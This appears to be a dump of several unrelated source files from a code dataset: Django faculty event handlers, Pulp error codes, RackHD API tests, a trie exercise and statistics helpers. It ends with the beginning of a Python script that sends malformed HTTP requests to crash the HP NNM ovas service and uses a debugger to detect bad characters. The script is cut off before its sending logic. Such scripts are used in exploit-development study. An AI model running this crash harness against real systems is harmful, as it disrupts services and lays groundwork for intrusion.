found = False
try:
ec = EventConfig.objects.get(unit=data['unit'],
event_type=AccreditationFlagEventHandler.EVENT_TYPE)
flags = dict(ec.config.get('flags', []))
if data['flag'] in flags:
found = True
except EventConfig.DoesNotExist:
pass
if not found:
raise forms.ValidationError("That attribute is not owned by the selected unit.")
return data
SEARCH_RULES = {
'flag': AccreditationFlagSearchRule,
}
SEARCH_RESULT_FIELDS = [
'flag',
]
def get_flag_display(self):
"""
Get the name of this flag, for display to the user
"""
from faculty.models import EventConfig
try:
ec = EventConfig.objects.get(unit=self.event.unit, event_type=self.EVENT_TYPE)
fellowships = dict(ec.config.get('flags', {}))
except EventConfig.DoesNotExist:
fellowships = {}
flag = self.event.config.get('flag', '???')
return fellowships.get(flag, flag)
@classmethod
def default_title(cls):
return 'Accreditation Flag'
def short_summary(self):
return "Has {0}".format(self.get_flag_display())
class ContractReviewEventHandler(CareerEventHandlerBase):
EVENT_TYPE = 'CONTRACTRV'
NAME = "Contract Renewal"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''
{% extends "faculty/event_base.html" %}
{% load event_display %}
{% block dl %}
<dt>Result</dt>
<dd>{{ handler|get_display:"result" }}</dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
result = forms.ChoiceField(label='Result', choices=CONTRACT_REVIEW_CHOICES)
SEARCH_RULES = {
'result': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'result',
]
def get_result_display(self):
return CONTRACT_REVIEW_CHOICES.get(self.get_config('result'), 'unknown outcome')
def short_summary(self):
return "Contract Renewal: {0}".format(self.get_result_display(),)
| gpl-3.0 | -6,561,575,408,359,670,000 | 38.732456 | 155 | 0.601317 | false |
ulif/pulp | common/pulp/common/error_codes.py | 1 | 9417 | from collections import namedtuple
from gettext import gettext as _
Error = namedtuple('Error', ['code', 'message', 'required_fields'])
"""
The error named tuple has 4 components:
code: The 7 character uniquely identifying code for this error, 3 A-Z identifying the module
followed by 4 numeric characters for the msg id. All general pulp server errors start
with PLP
message: The message that will be printed for this error
required_files: A list of required fields for printing the message
"""
# The PLP0000 error is to wrap non-pulp exceptions
PLP0000 = Error("PLP0000",
"%(message)s", ['message'])
PLP0001 = Error("PLP0001",
_("A general pulp exception occurred"), [])
PLP0002 = Error(
"PLP0002",
_("Errors occurred updating bindings on consumers for repo %(repo_id)s and distributor "
"%(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0003 = Error("PLP0003",
_("Errors occurred removing bindings on consumers while deleting a distributor for "
"repo %(repo_id)s and distributor %(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0004 = Error("PLP0004",
_("Errors occurred creating bindings for the repository group %(group_id)s. "
"Binding creation was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0005 = Error("PLP0005",
_("Errors occurred deleting bindings for the repository group %(group_id)s. "
"Binding deletion was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0006 = Error("PLP0006", _("Errors occurred while updating the distributor configuration for "
"repository %(repo_id)s"),
['repo_id'])
PLP0007 = Error("PLP0007",
_("Error occurred while cascading delete of repository %(repo_id)s to distributor "
"bindings associated with it."),
['repo_id'])
PLP0008 = Error("PLP0008",
_("Error raising error %(code)s. "
"The field [%(field)s] was not included in the error_data."),
['code', 'field'])
PLP0009 = Error("PLP0009", _("Missing resource(s): %(resources)s"), ['resources'])
PLP0010 = Error("PLP0010", _("Conflicting operation reasons: %(reasons)s"), ['reasons'])
PLP0011 = Error("PLP0011", _("Operation timed out after: %(timeout)s"), ['timeout'])
PLP0012 = Error("PLP0012", _("Operation postponed"), [])
PLP0014 = Error("PLP0014", _('Operation not implemented: %(operation_name)s'), ['operation_name'])
PLP0015 = Error("PLP0015", _('Invalid properties: %(properties)s'), ['properties'])
PLP0016 = Error("PLP0016", _('Missing values for: %(properties)s'), ['properties'])
PLP0017 = Error("PLP0017", _('Unsupported properties: %(properties)s'), ['properties'])
PLP0018 = Error("PLP0018", _('Duplicate resource: %(resource_id)s'), ['resource_id'])
PLP0019 = Error("PLP0019", _('Pulp only accepts input encoded in UTF-8: %(value)s'), ['value'])
PLP0020 = Error("PLP0020",
_("Errors occurred installing content for the consumer group %(group_id)s."),
['group_id'])
PLP0021 = Error("PLP0021",
_("Errors occurred updating content for the consumer group %(group_id)s."),
['group_id'])
PLP0022 = Error("PLP0022",
_("Errors occurred uninstalling content for the consumer group %(group_id)s."),
['group_id'])
PLP0023 = Error("PLP0023", _("Task is already in a complete state: %(task_id)s"), ['task_id'])
PLP0024 = Error("PLP0024",
_("There are no Celery workers found in the system for reserved task work. "
"Please ensure that there is at least one Celery worker running, and that the "
"celerybeat service is also running."),
[])
PLP0025 = Error("PLP0025", _("Authentication failed."), [])
PLP0026 = Error(
"PLP0026", _("Permission denied: user %(user)s cannot perform %(operation)s."),
['user', 'operation'])
PLP0027 = Error(
"PLP0027", _("Authentication with username %(user)s failed: invalid SSL certificate."),
['user'])
PLP0028 = Error(
"PLP0028", _("Authentication with username %(user)s failed: invalid oauth credentials."),
['user'])
PLP0029 = Error(
"PLP0029",
_("Authentication with username %(user)s failed: preauthenticated remote user is missing."),
['user'])
PLP0030 = Error(
"PLP0030",
_("Authentication with username %(user)s failed: invalid username or password"), ['user'])
PLP0031 = Error("PLP0031", _("Content source %(id)s could not be found at %(url)s"), ['id', 'url'])
PLP0032 = Error(
"PLP0032", _("Task %(task_id)s encountered one or more failures during execution."),
['task_id'])
PLP0034 = Error("PLP0034", _("The distributor %(distributor_id)s indicated a failed response when "
"publishing repository %(repo_id)s."),
['distributor_id', 'repo_id'])
PLP0037 = Error(
"PLP0037",
_("Content import of %(path)s failed - must be an existing file."),
['path'])
PLP0038 = Error("PLP0038", _("The unit model with id %(model_id)s and class "
"%(model_class)s failed to register. Another model has already "
"been registered with the same id."), ['model_id', 'model_class'])
PLP0040 = Error("PLP0040", _("Database 'seeds' config must include at least one hostname:port "
"value. Refer to /etc/pulp/server.conf for proper use."), [])
PLP0041 = Error("PLP0041", _("Database 'replica_set' config must be specified when more than one "
"seed is provided. Refer to /etc/pulp/server.conf for proper use."),
[])
PLP0042 = Error("PLP0042", _("This request is forbidden."), [])
PLP0043 = Error("PLP0043", _("Database 'write_concern' config can only be 'majority' or 'all'. "
"Refer to /etc/pulp/server.conf for proper use."), [])
PLP0044 = Error("PLP0044", _("The target importer does not support the types from the source"), [])
PLP0045 = Error("PLP0045", _("The repository cannot be exported because some units are "
"not downloaded."), [])
PLP0046 = Error("PLP0046", _("The repository group cannot be exported because these repos have "
"units that are not downloaded: %(repos)s"), ['repos'])
PLP0047 = Error("PLP0047", _("The importer %(importer_id)s indicated a failed response when "
"uploading %(unit_type)s unit to repository %(repo_id)s."),
['importer_id', 'unit_type', 'repo_id'])
PLP0048 = Error("PLP0048", _("The file is expected to be present, but is not, for unit %(unit)s"),
['unit'])
PLP0049 = Error(
"PLP0049",
_('Worker terminated abnormally while processing task %(task_id)s. '
'Check the logs for details'),
['task_id'])
# Create a section for general validation errors (PLP1000 - PLP2999)
# Validation problems should be reported with a general PLP1000 error with a more specific
# error message nested inside of it.
PLP1000 = Error("PLP1000", _("A validation error occurred."), [])
PLP1001 = Error("PLP1001", _("The consumer %(consumer_id)s does not exist."), ['consumer_id'])
PLP1002 = Error("PLP1002", _("The field %(field)s must have a value specified."), ['field'])
PLP1003 = Error(
"PLP1003",
_("The value specified for the field %(field)s must be made up of letters, numbers, "
"underscores, or hyphens with no spaces."),
['field'])
PLP1004 = Error(
"PLP1004",
_("An object of type %(type)s already exists in the database with an id of %(object_id)s"),
['type', 'object_id'])
PLP1005 = Error("PLP1005", _("The checksum type '%(checksum_type)s' is unknown."),
['checksum_type'])
PLP1006 = Error(
"PLP1006", _("The value specified for the field %(field)s may not start with %(value)s."),
['field', 'value'])
PLP1007 = Error("PLP1007", _("The relative path specified must not point outside of the parent"
" directory: %(path)s"), ['path'])
PLP1008 = Error("PLP1008", _("The importer type %(importer_type_id)s does not exist"),
['importer_type_id'])
PLP1009 = Error("PLP1009", _("The request body does not contain valid JSON"), [])
PLP1010 = Error("PLP1010", _("Provided value %(value)s for field %(field)s must be of type "
"%(field_type)s."), ["value", "field", "field_type"])
PLP1011 = Error("PLP1011", _("Invalid task state passed to purge: %(state)s."), ["state"])
PLP1012 = Error("PLP1012", _("No task state given to parameters list for delete."), [])
PLP1013 = Error("PLP1013", _("Checksum does not match calculated value."), [])
PLP1014 = Error("PLP1014", _("The configuration value for the key '%(key)s' in "
"section '%(section)s' is not valid for the following "
"reason: %(reason)s"), ["key", "section", "reason"])
PLP1015 = Error("PLP1015", _("The JSON data must be of type '%(data_type)s'."),
['data_type'])
| gpl-2.0 | 3,952,500,558,581,350,000 | 56.072727 | 100 | 0.609642 | false |
stuart-stanley/RackHD | test/tests/api/v2_0/nodes_tests.py | 1 | 20157 | from config.api2_0_config import config
from config.amqp import *
from modules.logger import Log
from modules.amqp import AMQPWorker
from modules.worker import WorkerThread, WorkerTasks
from on_http_api2_0 import ApiApi as Api
from on_http_api2_0 import rest
from datetime import datetime
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_false
from proboscis.asserts import assert_raises
from proboscis.asserts import assert_not_equal
from proboscis.asserts import assert_is_not_none
from proboscis.asserts import assert_true
from proboscis.asserts import fail
from proboscis import SkipTest
from proboscis import test
from json import loads
from time import sleep
LOG = Log(__name__)
@test(groups=['nodes_api2.tests'])
class NodesTests(object):
def __init__(self):
self.__client = config.api_client
self.__worker = None
self.__discovery_duration = None
self.__discovered = 0
self.__test_nodes = [
{
'identifiers': ["FF:FF:FF:01"],
'autoDiscover': False,
'name': 'test_switch_node',
'type': 'switch'
},
{
'identifiers': ["FF:FF:FF:02"],
'autoDiscover': False,
'name': 'test_mgmt_node',
'type': 'mgmt'
},
{
'identifiers': ["FF:FF:FF:03"],
'autoDiscover': False,
'name': 'test_pdu_node',
'type': 'pdu'
},
{
'identifiers': ["FF:FF:FF:04"],
'autoDiscover': False,
'name': 'test_enclosure_node',
'type': 'enclosure'
},
{
'identifiers': ["FF:FF:FF:05"],
'autoDiscover': False,
'name': 'test_compute_node',
'type': 'compute'
}
]
self.__test_tags = {
'tags': ['tag1', 'tag2']
}
self.__test_obm = {
'config': {
'host': '1.2.3.4',
'user': 'username',
'password': 'password'
},
'service': 'noop-obm-service'
}
def __get_data(self):
return loads(self.__client.last_response.data)
def __get_workflow_status(self, id, query ):
Api().nodes_get_workflow_by_id(identifier=id, active=query )
data = self.__get_data()
if len(data) > 0:
status = data[0].get('_status')
return status
return 'not running'
def __post_workflow(self, id, graph_name):
status = self.__get_workflow_status(id, 'true')
if status != 'pending' and status != 'running':
Api().nodes_post_workflow_by_id(identifier=id, name=graph_name, body={'name': graph_name})
timeout = 20
while status != 'pending' and status != 'running' and timeout != 0:
LOG.warning('Workflow status for Node {0} (status={1},timeout={2})'.format(id,status,timeout))
status = self.__get_workflow_status(id, 'true')
sleep(1)
timeout -= 1
return timeout
def check_compute_count(self):
Api().nodes_get_all()
nodes = self.__get_data()
count = 0
for n in nodes:
type = n.get('type')
if type == 'compute':
count += 1
return count
@test(groups=['nodes.api2.discovery.test'])
def test_nodes_discovery(self):
""" API 2.0 Testing Graph.Discovery completion """
count = defaults.get('RACKHD_NODE_COUNT', '')
if (count.isdigit() and self.check_compute_count() == int(count)) or self.check_compute_count():
LOG.warning('Nodes already discovered!')
return
self.__discovery_duration = datetime.now()
LOG.info('Wait start time: {0}'.format(self.__discovery_duration))
self.__task = WorkerThread(AMQPWorker(queue=QUEUE_GRAPH_FINISH, \
callbacks=[self.handle_graph_finish]), 'discovery')
def start(worker,id):
worker.start()
tasks = WorkerTasks(tasks=[self.__task], func=start)
tasks.run()
tasks.wait_for_completion(timeout_sec=1200)
assert_false(self.__task.timeout, \
message='timeout waiting for task {0}'.format(self.__task.id))
def handle_graph_finish(self,body,message):
routeId = message.delivery_info.get('routing_key').split('graph.finished.')[1]
Api().workflows_get()
workflows = self.__get_data()
for w in workflows:
injectableName = w.get('injectableName')
if injectableName == 'Graph.SKU.Discovery':
graphId = w.get('context',{}).get('graphId', {})
if graphId == routeId:
message.ack()
status = body.get('status')
if status == 'succeeded' or status == 'failed':
duration = datetime.now() - self.__discovery_duration
msg = {
'graph_name': injectableName,
'status': status,
'route_id': routeId,
'duration': str(duration)
}
if status == 'failed':
msg['active_task'] = w.get('tasks',{})
LOG.error(msg, json=True)
else:
LOG.info(msg, json=True)
self.__discovered += 1
break
check = self.check_compute_count()
if check and check == self.__discovered:
self.__task.worker.stop()
self.__task.running = False
self.__discovered = 0
@test(groups=['test-nodes-api2'], depends_on_groups=['nodes.api2.discovery.test'])
def test_nodes(self):
""" Testing GET:/api/2.0/nodes """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
assert_not_equal(0, len(nodes), message='Node list was empty!')
@test(groups=['test-node-id-api2'], depends_on_groups=['test-nodes-api2'])
def test_node_id(self):
""" Testing GET:/api/2.0/nodes/:id """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
codes = []
for n in nodes:
LOG.info(n,json=True)
if n.get('type') == 'compute':
uuid = n.get('id')
Api().nodes_get_by_id(identifier=uuid)
rsp = self.__client.last_response
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_get_by_id, 'fooey')
@test(groups=['create-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_create(self):
""" Testing POST:/api/2.0/nodes/ """
for n in self.__test_nodes:
LOG.info('Creating node (name={0})'.format(n.get('name')))
Api().nodes_post(identifiers=n)
rsp = self.__client.last_response
assert_equal(201, rsp.status, message=rsp.reason)
@test(groups=['patch-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id """
data = {"name": 'fake_name_test'}
Api().nodes_get_all()
nodes = self.__get_data()
codes = []
for n in nodes:
if n.get('name') == 'test_compute_node':
uuid = n.get('id')
Api().nodes_patch_by_id(identifier=uuid,body=data)
rsp = self.__client.last_response
test_nodes = self.__get_data()
assert_equal(test_nodes.get('name'), 'fake_name_test', 'Oops patch failed')
codes.append(rsp)
LOG.info('Restoring name to "test_compute_node"')
correct_data = {"name": 'test_compute_node'}
Api().nodes_patch_by_id(identifier=uuid,body=correct_data)
rsp = self.__client.last_response
restored_nodes = self.__get_data()
assert_equal(restored_nodes.get('name'), 'test_compute_node', 'Oops restoring failed')
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_by_id, 'fooey', data)
@test(groups=['delete-node-api2'], depends_on_groups=['patch-node-api2'])
def test_node_delete(self):
""" Testing DELETE:/api/2.0/nodes/:id """
codes = []
test_names = []
Api().nodes_get_all()
nodes = self.__get_data()
test_names = [t.get('name') for t in self.__test_nodes]
for n in nodes:
name = n.get('name')
if name in test_names:
uuid = n.get('id')
LOG.info('Deleting node {0} (name={1})'.format(uuid, name))
Api().nodes_del_by_id(identifier=uuid)
codes.append(self.__client.last_response)
assert_not_equal(0, len(codes), message='Delete node list empty!')
for c in codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_by_id, 'fooey')
@test(groups=['catalog_nodes-api2'], depends_on_groups=['delete-node-api2'])
def test_node_catalogs(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
for resp in resps:
assert_not_equal(0, len(resp), message='Node catalog is empty!')
assert_raises(rest.ApiException, Api().nodes_get_catalog_by_id, 'fooey')
@test(groups=['catalog_source-api2'], depends_on_groups=['catalog_nodes-api2'])
def test_node_catalogs_bysource(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs/source """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_source_by_id(identifier=n.get('id'), source='bmc')
resps.append(self.__client.last_response)
for resp in resps:
assert_equal(200,resp.status, message=resp.reason)
assert_raises(rest.ApiException, Api().nodes_get_catalog_source_by_id, 'fooey','bmc')
@test(groups=['node_workflows-api2'], depends_on_groups=['catalog_source-api2'])
def test_node_workflows_get(self):
""" Testing GET:/api/2.0/nodes/:id/workflows """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_workflow_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
# Api().nodes_get_workflow_by_id('fooey')
# try:
# Api().nodes_get_workflow_by_id('fooey')
# fail(message='did not raise exception for nodes_get_workflow_by_id with bad id')
# except rest.ApiException as e:
# assert_equal(404, e.status,
# message='unexpected response {0}, expected 404 for bad nodeId'.format(e.status))
# @test(groups=['node_post_workflows-api2'], depends_on_groups=['node_workflows-api2'])
# def test_node_workflows_post(self):
# """ Testing POST:/api/2.0/nodes/:id/workflows """
# resps = []
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = self.__post_workflow(id,'Graph.Discovery')
# if timeout > 0:
# data = self.__get_data()
# resps.append({'data': data, 'id':id})
# for resp in resps:
# assert_not_equal(0, len(resp['data']),
# message='No Workflows found for Node {0}'.format(resp['id']))
# assert_raises(rest.ApiException, Api().nodes_post_workflow_by_id, 'fooey',name='Graph.Discovery',body={})
# @test(groups=['node_workflows_del_active-api2'], depends_on_groups=['node_post_workflows-api2'])
# def test_workflows_action(self):
# """ Testing PUT:/api/2.0/nodes/:id/workflows/action """
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = 5
# done = False
# while timeout > 0 and done == False:
# if 0 == self.__post_workflow(id,'Graph.Discovery'):
# fail('Timed out waiting for graph to start!')
# try:
# Api().nodes_workflow_action_by_id(id, {'command': 'cancel'})
# done = True
# except rest.ApiException as e:
# if e.status != 404:
# raise e
# timeout -= 1
# assert_not_equal(timeout, 0, message='Failed to delete an active workflow')
# assert_raises(rest.ApiException, Api().nodes_workflow_action_by_id, 'fooey', {'command': 'test'})
@test(groups=['node_tags_patch'], depends_on_groups=['node_workflows-api2'])
def test_node_tags_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_patch_tag_by_id(identifier=n.get('id'), body=self.__test_tags)
LOG.info('Creating tag (name={0})'.format(self.__test_tags))
rsp = self.__client.last_response
codes.append(rsp)
LOG.info(n.get('id'));
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_get'], depends_on_groups=['node_tags_patch'])
def test_node_tags_get(self):
""" Testing GET:api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
Api().nodes_get_tags_by_id(n.get('id'))
rsp = self.__client.last_response
tags = loads(rsp.data)
codes.append(rsp)
for t in self.__test_tags.get('tags'):
assert_true(t in tags, message= "cannot find new tag" )
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_delete'], depends_on_groups=['node_tags_get'])
def test_node_tags_del(self):
""" Testing DELETE:api/2.0/nodes/:id/tags/:tagName """
get_codes = []
del_codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
get_codes.append(rsp)
for n in nodes:
for t in self.__test_tags.get('tags'):
Api().nodes_del_tag_by_id(identifier=n.get('id'), tag_name=t)
rsp = self.__client.last_response
del_codes.append(rsp)
Api().nodes_get_by_id(identifier=n.get('id'))
rsp = self.__client.last_response
get_codes.append(rsp)
updated_node = loads(rsp.data)
for t in self.__test_tags.get('tags'):
assert_true(t not in updated_node.get('tags'), message= "Tag " + t + " was not deleted" )
for c in get_codes:
assert_equal(200, c.status, message=c.reason)
for c in del_codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_tag_by_id, 'fooey',tag_name=['tag'])
@test(groups=['nodes_tag_masterDelete'], depends_on_groups=['node_tags_delete'])
def test_node_tags_masterDel(self):
""" Testing DELETE:api/2.0/nodes/tags/:tagName """
codes = []
self.test_node_tags_patch()
t = 'tag3'
LOG.info("Check to make sure invalid tag is not deleted")
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
LOG.info("Test to check valid tags are deleted")
for t in self.__test_tags.get('tags'):
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
for c in codes:
assert_equal(204, c.status, message=c.reason)
@test(groups=['node_put_obm_by_node_id'], depends_on_groups=['nodes_tag_masterDelete'])
def test_node_put_obm_by_node_id(self):
"""Testing PUT:/api/2.0/nodes/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_put_obms_by_node_id(identifier=n.get('id'), body=self.__test_obm)
LOG.info('Creating obm {0}'.format(self.__test_obm))
rsp = self.__client.last_response
LOG.info(n.get('id'));
assert_equal(201, rsp.status, message=rsp.status)
@test(groups=['node_get_obm_by_node_id'], depends_on_groups=['node_put_obm_by_node_id'])
def test_node_get_obm_by_node_id(self):
"""Testing GET:/api/2.0/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_get_obms_by_node_id(identifier=n.get('id'))
LOG.info('getting OBMs for node {0}'.format(n.get('id')))
rsp = self.__client.last_response
assert_equal(200, rsp.status, message=rsp.status)
obms = loads(rsp.data)
assert_not_equal(0, len(obms), message='OBMs list was empty!')
for obm in obms:
id = obm.get('id')
Api().obms_delete_by_id(identifier=id)
rsp = self.__client.last_response
assert_equal(204, rsp.status, message=rsp.status)
@test(groups=['node_put_obm_invalid'], depends_on_groups=['node_get_obm_by_node_id'])
def test_node_put_obm_invalid_node_id(self):
"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_put_obms_by_node_id(identifier='invalid_ID', body=self.__test_obm)
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
@test(groups=['node_get_obm_invalid'], depends_on_groups=['node_put_obm_invalid'])
def test_node_get_obm_invalid_node_id(self):
"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_get_obms_by_node_id(identifier='invalid_ID')
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
| apache-2.0 | -2,104,577,647,102,050,300 | 41.978678 | 114 | 0.540904 | false |
QuincyWork/AllCodes | Python/Codes/Practice/LeetCode/211 Add and Search Word - Data structure design.py | 1 | 1913 |
# define const variable
_MAX_LETTER_SIZE = 27;
_STRING_END_TAG = '#';
class TireNode(object):
def __init__(self,x):
self.value = x
self.childNodes = {}
class WordDictionary(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TireNode(0)
def addWord(self, word):
"""
Adds a word into the data structure.
:type word: str
:rtype: void
"""
word = word + _STRING_END_TAG
currentNode = self.root
childNode = None
for value in word:
childNode = currentNode.childNodes.get(value)
if not childNode:
childNode = TireNode(value)
currentNode.childNodes[value] = childNode
currentNode = childNode
def __searchChild(self,node,value):
currentNode = node
if not value:
return True
result = False
if value[0] == '.':
for key,child in currentNode.childNodes.items():
if self.__searchChild(child,value[1:]):
result = True
break
else:
child = currentNode.childNodes.get(value[0])
if child:
result = self.__searchChild(child,value[1:])
return result
def search(self, word):
"""
Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.
:type word: str
:rtype: bool
"""
word = word + _STRING_END_TAG
return self.__searchChild(self.root, word)
if __name__ == '__main__':
d = WordDictionary()
d.addWord("bad")
d.addWord("dad")
d.addWord("mad")
print(d.search("bad"))
print(d.search("pad"))
print(d.search(".ad"))
print(d.search("b.."))
| mit | -8,859,075,159,283,428,000 | 23.189873 | 125 | 0.521193 | false |
thorwhalen/ut | stats/util.py | 1 | 2022 | __author__ = 'thor'
from numpy import zeros, argmin, array, unique, where
from scipy.spatial.distance import cdist
def _df_picker(df, x_cols, y_col):
return df[x_cols].as_matrix(), df[[y_col]].as_matrix()
def df_picker_data_prep(x_cols, y_col):
return lambda df: _df_picker(df, x_cols, y_col)
def binomial_probs_to_multinomial_probs(binomial_probs):
multinomial_probs = zeros((len(binomial_probs), 2))
multinomial_probs[:, 1] = binomial_probs
multinomial_probs[:, 0] = 1 - multinomial_probs[:, 1]
return multinomial_probs
def multinomial_probs_to_binomial_probs(multinomial_probs):
return multinomial_probs[:, 1]
def normalize_to_one(arr):
arr = array(arr)
return arr / float(sum(arr))
def point_idx_closest_to_centroid(X, centroid=None):
"""
X is a n x m ndarray of n points in m dimensions.
point_closest_to_centroid(X, centroid) returns the index of the point of X (a row of X) that is closest to the given
centroid point. If centroid is not given, the actual centroid, X.mean(axis=1), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return argmin(cdist(X, [centroid])[:, 0])
def point_closest_to_centroid(X, centroid=None):
"""
X is a n x m ndarray of n points in m dimensions.
point_closest_to_centroid(X, centroid) returns the point of X (a row of X) that is closest to the given
centroid point. If centroid is not given, the actual centroid, X.mean(axis=1), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return X[argmin(cdist(X, [centroid])[:, 0])]
def get_cluster_representatives_indices(X, clus_labels, clus_centers):
representative_indices = list()
for label in unique(clus_labels):
cluster_point_indices = where(clus_labels == label)[0]
min_idx = argmin(cdist(X[cluster_point_indices, :], [clus_centers[label, :]])[:, 0])
representative_indices.append(cluster_point_indices[min_idx])
return array(representative_indices)
| mit | 2,205,652,758,375,168,500 | 32.7 | 120 | 0.674085 | false |
greyshell/linuxJuicer | badchar-detection-automated/badchar-detection-HPNNM-B.07.53.py | 1 | 8764 | #!/usr/bin/env python
# Description: Identify good and bad chars in HPNNM-B.07.53
# author: greyshell
# Script requirements: python 2.7 x86, pydbg 32bit binary, python wmi, pywin32
# Copy pydbg inside C:\Python27\Lib\site-packages\
# Copy pydasm.pyd inside C:\Python27\Lib\site-packages\pydbg\
import os
import socket
import subprocess
import sys
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# Global variables
allchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
request_template = (
"GET /topology/homeBaseView HTTP/1.1\r\n"
"Host: {}\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
"Content-Length: 1048580\r\n\r\n"
)
# Current char that is being checked
cur_char = ""
badchars = []
goodchars = []
evil_str_sent = False
service_is_running = False
def chars_to_str(chars):
# Convert a list of chars to a string
result = ""
for char in chars:
result += "\\x{:02x}".format(ord(char))
return result
def crash_service():
# Send malformed data to ovas service in order to crash it. Function runs in an independent thread
global evil_str_sent, cur_char, badchars, goodchars, allchars
global service_is_running
char_counter = -1
timer = 0
while True:
# Don't send evil string if process is not running
